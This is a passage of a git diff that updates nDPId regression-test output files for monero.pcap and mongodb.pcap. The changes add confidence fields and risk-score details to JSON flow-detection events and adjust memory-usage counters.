-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00921{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00922{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 319/319
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4617584 bytes
-~~ total memory freed........: 4617584 bytes
-~~ total allocations/frees...: 99879/99879
+~~ total memory allocated....: 4702209 bytes
+~~ total memory freed........: 4702209 bytes
+~~ total allocations/frees...: 101469/101469
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 737 chars
-~~ json string avg len.......: 516 chars
+~~ json string max len.......: 927 chars
+~~ json string avg len.......: 610 chars
diff --git a/test/results/mongodb.pcap.out b/test/results/mongodb.pcap.out
index 7cad2fa94..b33d4269c 100644
--- a/test/results/mongodb.pcap.out
+++ b/test/results/mongodb.pcap.out
@@ -3,32 +3,32 @@
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1483726705497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483726705497,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAAQCMwQAA9BrgMCgoKDgoKCg\/wP2mJBNDEtQAAAACwwv\/\/uGgAAAIEBWoBAwMFAQEICjJ1xd4AAAAABAIAAA=="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1483726705499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"ts_msec":1483726705499,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAA4BuBACgoKDwoKCg5pifA\/z9O+JwTQxLagUnEgLR0AAAIEBbQEAggKGQyESzJ1xd4BAwMH"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"ts_msec":1483726705503,"pkt":"ABsXAAEkACKDPxfFgQAAZAgARQAANDYCQAA9BqVGCgoKDgoKCg\/wP2mJBNDEts\/TviiAEBAavSkAAAEBCAoydcXkGQyESw=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1483726705503,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483726705497,"flow_last_seen":1483726705503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483737232974,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1483737232974,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1483737232974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483737232974,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAAQB7UQAA6BjnMCgoKEAoKChHInmmJ0eCpcgAAAACwAv\/\/iv8AAAIEBWoBAwMFAQEICj5g2FMAAAAABAIAAA=="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1483737232975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"ts_msec":1483737232975,"pkt":"ACKDPxfFABsXAAEkgQAAZAgARQAAPAAAQAAyBmCkCgoKEQoKChBpicie7T3P\/tHgqXOgEkXqkCgAAAIEBbQEAggKAY8GyD5g2FMBAwMI"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"ts_msec":1483737232979,"pkt":"ABsXAAEkLGv11hfFgQAAZAgARQAANFg1QAA6BgB3CgoKEAoKChHInmmJ0eCpc+09z\/+AEBAa9MAAAAEBCAo+YNhYAY8GyA=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1483737232979,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
